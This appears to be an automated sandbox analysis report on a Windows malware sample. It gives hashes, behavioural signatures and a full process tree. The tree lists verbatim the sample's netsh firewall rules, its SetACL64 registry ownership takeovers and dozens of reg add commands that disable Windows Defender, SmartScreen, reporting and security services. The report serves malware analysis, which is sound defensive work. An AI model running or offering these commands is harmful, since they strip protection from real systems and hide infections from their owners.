Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    08-11-2024 02:38

General

  • Target

    a6e96840029b64d72ddfd94ede969f521e1c05b91d5c23eee56b66afae6800c0.exe

  • Size

    2.5MB

  • MD5

    9ba307c1c2098da12fb968a04b71dd5b

  • SHA1

    288b7dde05bfa47c007eb728bb2813e0306bc734

  • SHA256

    a6e96840029b64d72ddfd94ede969f521e1c05b91d5c23eee56b66afae6800c0

  • SHA512

    7885ad544e4a5d691700ccb63f366ae17cef1565c6185096eba9ef50d5e7bedef3e6957876c2be7e235b592ed7c04280883948e53059f787d47636a0e89d10f8

  • SSDEEP

    49152:PHg6ex2uF+sfC0sJfPT2Xs2WyexyCfXHHVz6UWimMVUiPCqsnaVnHB4lmtpQ3l5c:Pro2wfqNSoyc0G7r6XnaVn/tW5c

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 14 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 4 IoCs
  • Modifies security service 2 TTPs 4 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • ACProtect 1.3x - 1.4x DLL software 2 IoCs

    Detects file using ACProtect software.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 62 IoCs
  • Loads dropped DLL 43 IoCs
  • Windows security modification 2 TTPs 4 IoCs
  • Modifies Security services 2 TTPs 10 IoCs

    Modifies the startup behavior of a security service.

  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 48 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a6e96840029b64d72ddfd94ede969f521e1c05b91d5c23eee56b66afae6800c0.exe
    "C:\Users\Admin\AppData\Local\Temp\a6e96840029b64d72ddfd94ede969f521e1c05b91d5c23eee56b66afae6800c0.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2432
    • C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name=tbjfarxhkycdu dir=in action=allow program="C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\tbjfarxhkycdu.exe" enable=yes profile=public,private
      2⤵
      • Modifies Windows Firewall
      • Event Triggered Execution: Netsh Helper DLL
      PID:1780
    • C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name=tbjfarxhkycdu dir=out action=allow program="C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\tbjfarxhkycdu.exe" enable=yes profile=public,private
      2⤵
      • Modifies Windows Firewall
      • Event Triggered Execution: Netsh Helper DLL
      PID:1652
    • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\dotNetFx40_Full_setup.exe
      "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\dotNetFx40_Full_setup.exe" /q /norestart
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2720
      • C:\5fced4a23532ffa6c68cee939e2e5029\Setup.exe
        C:\5fced4a23532ffa6c68cee939e2e5029\\Setup.exe /q /norestart /x86 /x64 /ia64 /web
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:980
    • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\dotNetFx45_Full_setup.exe
      "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\dotNetFx45_Full_setup.exe" /q /norestart
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2264
      • C:\72da8cab8fc8d92f6b4bd9\Setup.exe
        C:\72da8cab8fc8d92f6b4bd9\\Setup.exe /q /norestart /x86 /x64 /web
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:2820
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\bn.bat
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2744
      • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\SetACL64.exe
        SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1708
      • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\SetACL64.exe
        SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:984
      • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\SetACL64.exe
        SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:888
      • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\SetACL64.exe
        SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2340
      • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\SetACL64.exe
        SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
        3⤵
        • Executes dropped EXE
        • Windows security modification
        • Suspicious use of AdjustPrivilegeToken
        PID:1552
      • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\SetACL64.exe
        SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
        3⤵
        • Executes dropped EXE
        • Windows security modification
        • Suspicious use of AdjustPrivilegeToken
        PID:2272
      • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\SetACL64.exe
        SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
        3⤵
        • Executes dropped EXE
        • Windows security modification
        • Suspicious use of AdjustPrivilegeToken
        PID:2028
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\bnz.bat
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:1884
      • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\SetACL64.exe
        SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
        3⤵
        • Executes dropped EXE
        • Windows security modification
        • Suspicious use of AdjustPrivilegeToken
        PID:2236
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
        3⤵
          PID:2368
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
          3⤵
          • System Location Discovery: System Language Discovery
          PID:804
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
          3⤵
            PID:2596
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2672
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
            3⤵
              PID:2652
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
              3⤵
              • System Location Discovery: System Language Discovery
              PID:2684
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
              3⤵
              • System Location Discovery: System Language Discovery
              PID:2240
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
              3⤵
                PID:2328
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
                3⤵
                • System Location Discovery: System Language Discovery
                PID:1016
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
                3⤵
                • System Location Discovery: System Language Discovery
                PID:2548
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
                3⤵
                • System Location Discovery: System Language Discovery
                PID:2656
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
                3⤵
                  PID:2612
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2936
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2196
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2564
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\bnn.bat
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2572
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2728
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\bn1.bat
                2⤵
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2692
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2688
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:1700
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2460
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
                  3⤵
                    PID:2468
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:2476
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:2488
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:2508
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:2528
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
                    3⤵
                      PID:2576
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:3024
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:2212
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:2704
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f
                      3⤵
                        PID:2000
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
                        3⤵
                          PID:1616
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:1492
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f
                          3⤵
                          • Modifies Windows Defender Real-time Protection settings
                          • System Location Discovery: System Language Discovery
                          PID:2292
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f
                          3⤵
                          • Modifies Windows Defender Real-time Protection settings
                          • System Location Discovery: System Language Discovery
                          PID:2228
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f
                          3⤵
                          • Modifies Windows Defender Real-time Protection settings
                          • System Location Discovery: System Language Discovery
                          PID:1596
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f
                          3⤵
                          • Modifies Windows Defender Real-time Protection settings
                          PID:672
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f
                          3⤵
                          • Modifies Windows Defender Real-time Protection settings
                          PID:340
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f
                          3⤵
                          • Modifies Windows Defender Real-time Protection settings
                          • System Location Discovery: System Language Discovery
                          PID:2784
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f
                          3⤵
                          • Modifies Windows Defender Real-time Protection settings
                          • System Location Discovery: System Language Discovery
                          PID:2444
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:2792
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f
                          3⤵
                            PID:1936
                          • C:\Windows\SysWOW64\reg.exe
                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1732
                          • C:\Windows\SysWOW64\reg.exe
                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f
                            3⤵
                              PID:2260
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:1940
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f
                              3⤵
                                PID:884
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:2516
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f
                                3⤵
                                  PID:2760
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f
                                  3⤵
                                    PID:1716
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1904
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1820
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1640
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1764
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:776
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f
                                    3⤵
                                      PID:1844
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f
                                      3⤵
                                        PID:2740
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2756
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1988
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2020
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2808
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f
                                        3⤵
                                          PID:1680
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:1804
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:2800
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:1040
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:1760
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f
                                          3⤵
                                            PID:1340
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2788
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:548
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2752
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:1780
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:1920
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f
                                            3⤵
                                              PID:2840
                                            • C:\Windows\SysWOW64\reg.exe
                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2772
                                            • C:\Windows\SysWOW64\reg.exe
                                              reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f
                                              3⤵
                                              • Modifies Windows Defender notification settings
                                              • System Location Discovery: System Language Discovery
                                              PID:2904
                                            • C:\Windows\SysWOW64\reg.exe
                                              reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
                                              3⤵
                                              • Modifies Windows Defender notification settings
                                              • System Location Discovery: System Language Discovery
                                              PID:2888
                                            • C:\Windows\SysWOW64\reg.exe
                                              reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:3012
                                            • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                              PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1028
                                              • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
                                                4⤵
                                                • Executes dropped EXE
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2880
                                                • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Modifies data under HKEY_USERS
                                                  PID:1460
                                                  • C:\Windows\System32\reg.exe
                                                    "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
                                                    6⤵
                                                      PID:1316
                                              • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
                                                3⤵
                                                • Executes dropped EXE
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2076
                                                • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1396
